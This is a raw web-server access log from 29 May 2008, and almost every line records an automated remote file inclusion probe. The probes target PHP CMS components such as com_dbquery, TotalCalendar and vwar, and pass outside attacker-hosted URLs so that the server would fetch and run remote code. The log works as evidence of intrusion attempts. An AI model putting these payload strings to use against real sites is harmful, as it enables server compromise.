222.122.141.76 - - [29/May/2008:12:01:57 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:01:58 -0700] "GET /logs/access_080326.log//index.php?root_PATH=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:02:03 -0700] "GET //index.php?root_PATH=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:02:03 -0700] "GET /logs//index.php?root_PATH=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:02:18 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:02:24 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:02:24 -0700] "GET //component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:02:24 -0700] "GET /logs//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:02:37 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:12:02:38 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:12:02:38 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.42.59 - - [29/May/2008:12:02:45 -0700] "GET /logs/access_080312.log/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:03:14 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:03:14 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [29/May/2008:12:03:19 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [29/May/2008:12:03:19 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:03:26 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:28 -0700] "GET /logs/access_080102.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:28 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:28 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:03:36 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:03:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:03:38 -0700] "GET /logs/access.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:47 -0700] "GET /logs/access_080102.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:48 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:48 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:50 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:03:52 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:03:57 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:03:58 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:03:58 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:04:00 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:04:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:04:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:04:03 -0700] "GET /logs/access_080305.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:04:08 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:04:08 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:04:08 -0700] "GET /logs/access_071225.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:04:08 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:04:09 -0700] "GET /logs/access_080418.log//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:04:09 -0700] "GET /logs/access_080102.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:04:34 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:04:34 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:04:34 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:12:04:36 -0700] "GET /logs/access.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:04:36 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:04:39 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:12:04:42 -0700] "GET /logs/access_080327.log/index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:12:04:43 -0700] "GET /logs/access.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:04:49 -0700] "GET /logs/access.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:12:05:01 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:12:05:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:12:05:06 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:05:10 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:05:10 -0700] "GET //component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:05:11 -0700] "GET /logs//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:12:05:13 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:12:05:19 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:39 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:39 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:39 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:40 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:40 -0700] "GET /modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:40 -0700] "GET /logs/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:40 -0700] "GET /logs/access_071226.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:05:42 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:12:05:50 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:12:05:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:12:05:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:05:57 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:05:59 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:06:03 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:12:06:36 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:06:44 -0700] "GET /logs/access_080207.log/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:06:44 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:06:44 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:06:54 -0700] "GET /logs/access.log/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:06:54 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:06:55 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:12:07:08 -0700] "GET /logs/access_080301.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:07:13 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:07:14 -0700] "GET /logs/access_080209.log//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:07:15 -0700] "GET /logs/access_071122.log/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:07:17 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:07:22 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.7.65.157 - - [29/May/2008:12:07:33 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:12:07:40 -0700] "GET /logs/access_080208.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:07:51 -0700] "GET //index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 5001 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:12:07:51 -0700] "GET /logs/access.log//includes/joomla.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:12:07:52 -0700] "GET //includes/joomla.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:12:07:52 -0700] "GET /logs//includes/joomla.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.141.74 - - [29/May/2008:12:07:53 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:07:53 -0700] "GET /logs//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:12:08:31 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:39 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:41 -0700] "GET /logs/access_080225.log//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:42 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:42 -0700] "GET //lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:43 -0700] "GET /logs//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:08:55 -0700] "GET /logs/access_071219.log/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:08:56 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.25.107.34 - - [29/May/2008:12:09:14 -0700] "GET /logs/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.25.107.34 - - [29/May/2008:12:09:15 -0700] "GET /Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:09:26 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:09:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:09:32 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:09:33 -0700] "GET //includes/db_adodb.php?baseDir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:09:33 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:09:46 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:09:48 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:09:49 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:09:49 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:09:49 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:09:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:09:51 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:09:52 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:12:10:07 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:12:10:08 -0700] "GET /newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:12:10:08 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:10:18 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:10:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:10:19 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:10:21 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:12:10:33 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:10:50 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
